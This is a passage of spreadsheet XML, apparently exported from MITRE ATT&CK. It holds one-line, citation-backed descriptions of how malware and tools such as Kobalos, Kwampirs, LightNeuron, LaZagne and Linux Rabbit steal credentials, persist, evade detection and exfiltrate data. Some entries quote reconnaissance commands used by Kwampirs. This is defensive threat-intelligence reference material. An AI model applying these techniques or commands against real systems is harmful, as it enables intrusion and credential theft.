    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can write captured SSH connection credentials to a file under the &lt;code&gt;/var/run&lt;/code&gt; directory with a &lt;code&gt;.pid&lt;/code&gt; extension for exfiltration.(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t>relationship--773e62aa-8b0a-4ed2-9954-1886c789e926</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) decrypts strings right after the initial communication, but before the authentication process.(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t>relationship--8265aa36-4e63-4ee9-8cfe-4ed82839efce</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can exfiltrate credentials over the network via UDP.(Citation: ESET Kobalos Feb 2021) </t>
  </si>
  <si>
    <t>relationship--91cd43d9-17cb-41d3-b62d-4b79030f4384</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</si>
  <si>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</si>
  <si>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relationship--cf2df7c3-3efe-49d9-9c49-e35978d784c4</t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) can chain together multiple compromised machines as proxies to reach their final targets.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t>relationship--fdc0030c-ed38-49b0-afcc-266e19aa363e</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) encrypts all strings using RC4 and bundles all functionality into a single function call.(Citation: ESET Kobalos Feb 2021) </t>
  </si>
  <si>
    <t>relationship--9d11c36e-e738-4d2a-98cf-f5f962a716ea</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641)'s post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t>relationship--8d75c103-c7d8-44cd-afb6-f36f763c031f</t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) can record the hostname and kernel version of the target machine.(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t>relationship--f068a0fc-0461-4034-a0ea-b629788bc9f3</t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) can record the IP address of the target machine.(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t>relationship--69826fb0-b508-43a3-a454-9718a854ab38</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</si>
  <si>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</si>
  <si>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relationship--9bbfc21c-17ab-4f9a-bd8c-5079ee9b180f</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) is triggered by an incoming TCP connection to a legitimate service from a specific source port.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) </t>
  </si>
  <si>
    <t>relationship--894e96b2-2dac-4958-8f14-8eacf169b9b6</t>
  </si>
  <si>
    <t xml:space="preserve">[Kobalos](https://attack.mitre.org/software/S0641) can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.(Citation: ESET Kobalos Feb 2021) </t>
  </si>
  <si>
    <t>relationship--2df3ee99-0ad3-4da8-b25e-bbb47bb8562c</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) trojan supports file deletion.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>relationship--3b31b258-d3e0-4acc-9c20-de870baa64a0</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) payload is stored in a hidden directory at &lt;code&gt;/Users/Shared/.local/kextd&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>relationship--f5acb12e-6d83-4628-9b1d-61f277a699b2</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</si>
  <si>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</si>
  <si>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relationship--e42547e7-0bf9-4a29-b3af-f80bd0b78e38</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects a running process list.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>relationship--9a62c02a-e373-494e-af73-f8b3274e8c9b</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses an 11-byte XOR algorithm to hide data.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>relationship--c08ef8e9-9e12-4bb2-9e6a-061934f33ea0</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects the current running username.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>relationship--707d131d-39ff-4ea0-a8ef-63dd7ca2a854</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses HTTP POST requests.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>relationship--cdca2bdf-a29b-45d5-90ff-17ab56b094a4</t>
  </si>
  <si>
    <t>Before writing to disk, [Kwampirs](https://attack.mitre.org/software/S0236) inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--97d77da2-9e26-4168-b14c-9d26093aa5be</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) decrypts and extracts a copy of its main DLL payload when executing.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--2d822996-4574-402d-8d0f-1cfc0e963850</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of domain groups with the command &lt;code&gt;net localgroup /domain&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--040ff1f7-493d-4762-a9bb-db143a971464</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses a large list of C2 servers that it cycles through until a successful connection is established.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--e2317e9b-9301-4c44-959f-94d66858136c</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of files and directories in C:\ with the command &lt;code&gt;dir /s /a c:\ &gt;&gt; "C:\windows\TEMP\[RANDOM].tmp"&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--4e07996d-c9d9-49a8-9800-94daf69cd3b3</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files from C2 servers.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
    <t>relationship--9b102737-2d47-4dd5-b4f2-2a323c506cfb</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of accounts with the command &lt;code&gt;net users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--11fef36d-e857-4e0e-93e0-f0361df83ced</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</si>
  <si>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</si>
  <si>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relationship--fb243cd7-7dec-4836-a341-c9e30c0099ee</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) establishes persistence by adding a new service with the display name "WMI Performance Adapter Extension" in an attempt to masquerade as a legitimate WMI service.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--abdf9690-d578-4f86-a2cc-295c2789bb4e</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of network shares with the command &lt;code&gt;net share&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--2beb9f29-a94b-469a-870e-2e2072bf941c</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files that are base64-encoded and encrypted with another cipher.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
    <t>relationship--5550ef5e-a34c-4055-b7be-dd41d76ef7b1</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects password policy information with the command &lt;code&gt;net accounts&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--ddda59d4-5455-4d42-901b-b7a227a8a023</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--c0f3f4f3-e435-443f-aa89-18afb0115055</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of available servers with the command &lt;code&gt;net view&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--71fd7b73-462f-4629-8d95-59d0129b1503</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses rundll32.exe in a Registry value added to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--b3877b02-98e4-4c4a-8034-5af9f1e65c2c</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) copies itself over network shares to move laterally on a victim network.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--9663d78b-0a81-42af-93b0-8e62cc3af2d7</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</si>
  <si>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</si>
  <si>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relationship--a8dc6cca-3ede-4110-baf1-8ce53fb655a9</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</si>
  <si>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</si>
  <si>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relationship--cfa38151-4972-4355-8071-dd36cb1be880</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of active and listening connections by using the command &lt;code&gt;netstat -nao&lt;/code&gt; as well as a list of available network mappings with &lt;code&gt;net use&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--c195f2cb-deff-400e-b89e-8625deaa9817</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects registered owner details by using the commands &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--64006d31-51ea-4908-8b09-2650fdc6b4f8</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /svc&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--36f0915e-66aa-4062-b909-35414c639ae1</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) creates a new service named WmiApSrvEx to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--56c41e3f-3d8f-4f36-9885-955952e700db</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox cloud storage service for command and control.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--8c9f23e6-2665-45b3-9c28-53a9335b16ce</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</si>
  <si>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</si>
  <si>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relationship--25cb2c8f-79d2-4157-8329-fb86caaca0c3</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) command and control occurs via HTTPS over port 443.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--12cc7738-bb90-4e77-a96d-8e4f312e07d4</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information from /etc/shadow using the shadow.py module.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>relationship--3822f934-0b93-417b-bb1d-06218d51922e</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from MSCache to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>relationship--9399157f-4443-447f-b2e1-2227582af6e6</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from chats, databases, mail, and WiFi.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>relationship--229150e3-5c4b-475e-8981-27fb472ad119</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from databases, mail, and WiFi across multiple platforms.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>relationship--b0f355cc-e11f-4027-9db3-59ec64cd367f</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>relationship--3b806ebb-0c5d-4ba8-adf8-b215a59f81b0</t>
  </si>
  <si>
    <t xml:space="preserve">[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from macOS Keychains.(Citation: GitHub LaZagne Dec 2018)	</t>
  </si>
  <si>
    <t>relationship--b32c6aa0-9299-4ada-a626-9805ba1f1610</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from LSA secrets to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>relationship--2fff9b06-61f5-41f5-8cef-210485eaa8b2</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from memory to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>relationship--43619944-94e9-43d9-a761-8e4db2113eef</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can use the `&lt;PID&gt;/maps` and `&lt;PID&gt;/mem` files to identify regex patterns to dump cleartext passwords from the browser's process memory.(Citation: GitHub LaZagne Dec 2018)(Citation: Picus Labs Proc cump 2022)</t>
  </si>
  <si>
    <t>relationship--bb9706eb-de51-4200-ac38-d7d658f90ea9</t>
  </si>
  <si>
    <t xml:space="preserve">[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from Vault files.(Citation: GitHub LaZagne Dec 2018)	</t>
  </si>
  <si>
    <t>relationship--250af0e7-a45e-4cbe-9cad-5445e8669022</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) contains a function to encrypt and store emails that it collects.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--6259ae94-15ac-4343-9eb9-7315160bf58a</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically collect files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--83d16911-5fa1-4646-9718-6af0852dcb9a</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically exfiltrate files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--2b1fb532-84e3-4f77-962c-038c798d239e</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can collect files from a local system.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--92a5d02f-8f2e-4744-b030-54f2222bde88</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used AES and XOR to decrypt configuration files and commands.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--54d9e07f-eff6-41e9-8821-3bb7ac657c8c</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) exfiltrates data over its email C2 channel.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--3b6f4d0d-352f-4e0f-8a7d-5b843a21295a</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has a function to delete files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--01b13af3-d241-47ed-b351-e83604c0d92f</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has the ability to download and execute additional files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--80cc26ad-62b5-49f0-bb8d-bd588bd51585</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can store email data in files and directories specified in its configuration, such as &lt;code&gt;C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--87999cb2-7565-465a-ad10-b585be2e3e3f</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses SMTP for C2.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--12918fb6-9b92-4644-a4c2-4f2f471e9b2c</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used filenames associated with Exchange and Outlook for binary and configuration files, such as &lt;code&gt;winmail.dat&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--68017126-a4fe-4c2d-926d-fbc51ea8573c</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of starting a process using CreateProcess.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--abf45442-6ca3-4538-ad21-db2e46f43f67</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) encrypts its configuration files with AES-256.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--4224d1f3-e634-4aa1-a6a5-bad5c1e81604</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) collects Exchange emails matching rules specified in its configuration.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--6c42fa31-80df-4d67-92d2-4273c22a4d5b</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to exfiltrate data during nighttime or working hours.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--20c556ad-adcd-4b60-bde1-c3eff06c0593</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--4be17eba-9ee0-46ff-b019-ce32c25ad146</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses AES to encrypt C2 traffic.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--86db4034-d33f-4067-b133-70ea904fa461</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers the victim computer name using the Win32 API call &lt;code&gt;GetComputerName&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--70f5df58-30d0-4866-bfee-64dcf10edca9</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers information about network adapters using the Win32 API call &lt;code&gt;GetAdaptersInfo&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--9a6825cb-0656-4d42-b4d7-8d0fa55394c0</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of modifying email content, headers, and attachments during transit.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--973e4318-a08c-491c-afa3-d110f9d87758</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used a malicious Microsoft Exchange transport agent for persistence.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--be55801c-82ed-4abe-960f-9bca9d704ffc</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of executing commands via cmd.exe.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>relationship--91d50267-6892-407e-8e0a-01435e6303a9</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can obtain data from local systems.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--d6049a18-43d5-4761-ad56-a60e2a7998cf</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change C2 servers.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--0fbd4496-f715-4edd-b4da-169d6047a7c9</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--62eee3f5-f7ab-4029-a690-635452f1def7</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can list contents of drives and search for files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--6203e555-d5f9-4b3c-978b-d10db7575dbc</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can download files onto compromised hosts.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--5c08eb3a-d7a0-4ce0-97a2-496ea4c9f3ed</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve a list of running processes.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--92e35558-f915-4357-b397-3cc7a0412b92</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--66f2ff8f-abc2-4a6c-9652-89d7c824422c</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve system information.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--05104256-7e9a-457b-8e9f-86976992f3c7</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can start a remote shell.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>relationship--76ca2629-da20-42ce-95e1-b9f93406a87c</t>
  </si>
  <si>
    <t>S0362</t>
  </si>
  <si>
    <t>Linux Rabbit</t>
  </si>
  <si>
    <t>malware--0efefea5-78da-4022-92bc-d726139e8883</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) sends the payload from the C2 server as an encoded URL parameter. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>relationship--9a2046a3-41c8-4d81-a812-63c66bcb3400</t>
  </si>
  <si>
    <t>04 March 2019</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) attempts to gain access to the server via SSH.(Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>relationship--1f8572d0-007f-4efd-8caa-58ea88849cd1</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) brute forces SSH passwords in order to attempt to gain access and install its malware onto the server. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>relationship--1cf57140-fe45-4c26-8946-071252ae8276</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>relationship--9613ad57-7f24-4dff-bea3-2626d8b2c335</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) maintains persistence on an infected machine through rc.local and .bashrc files. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>relationship--37e9f2ca-a7cb-4cc1-bf0f-4e2d36711b88</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) acquires valid SSH accounts through brute force. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>relationship--e5ba408f-92d3-404a-b3e1-adcd5d21bc5f</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to decrypt and decode multiple layers of obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--0575a941-3af6-4b7b-93df-30f6001760ac</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can securely delete files by first writing random data to the file.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--746c2da0-7ee6-4dd7-90b1-23c020cdb71d</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to download files.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--a34352d8-8dc9-4721-9e73-ae56f5a886e7</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can query the Registry to check for the presence of &lt;code&gt;HKCU\Software\KasperskyLab&lt;/code&gt;.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--59c92aeb-1e62-4e60-8ead-63100e068c0d</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can create persistence by adding a shortcut in the &lt;code&gt;CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--608ecdef-db04-419b-b453-0aeb538c7093</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to check for the presence of Kaspersky security software.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--bedac37c-22e0-4220-8552-48da4aed5f44</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has been packed with multiple layers of encryption.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--9877098c-6643-49fb-8b7c-72ea44718cae</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has used image files to hide its loader component.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--2e55a09d-0784-4a74-bd3a-6beca63adcce</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can enumerate the CPUID and BIOS version on a compromised system.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--137ce702-f0e6-4dfa-8ca5-439155d91af9</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to discover the proxy configuration of Firefox and/or Opera.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--32af5f8f-e219-4635-b8f1-d98f0913f4c0</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can enumerate the account name on a targeted system.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--d54e7a92-0601-4b77-8675-46e33b577b4d</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can wait 30 seconds before executing additional code if security software is detected.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--ab4d7a1b-2b5a-44b6-a363-363d3f3f6e05</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can use HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--37539ea1-3b70-4e95-853f-e023d8bfc203</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can send collected data, including screenshots, over its C2 channel.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--d61aad08-1ad3-4cba-a8e6-a8106089a635</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) has the ability to download payloads containing system commands to a compromised host.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--3593e540-dfc0-4995-8640-db52961b3666</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can use various API calls.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--85965bfa-658a-47e5-b15d-c0ef67341bda</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can use a PowerShell script to execute commands.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--487f677f-4525-4a02-ac95-2a83e4a4bf7b</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can query the Registry for keys added to execute COM hijacking.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--3b035642-31cc-498e-9dff-9e145b35b968</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can create a scheduled task to enable persistence mechanisms.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--f250ea40-1899-4bc4-b7f9-7a795ec32f23</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can take system screenshots and save them to `%AppData%`.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--516fd2f8-a709-43f4-86e1-c753e28113e1</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can identify installed AV software.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--f690a8fd-1a22-4f6d-bbd2-76cc344ecf5e</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) has the ability to list local drives and enumerate the OS architecture.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
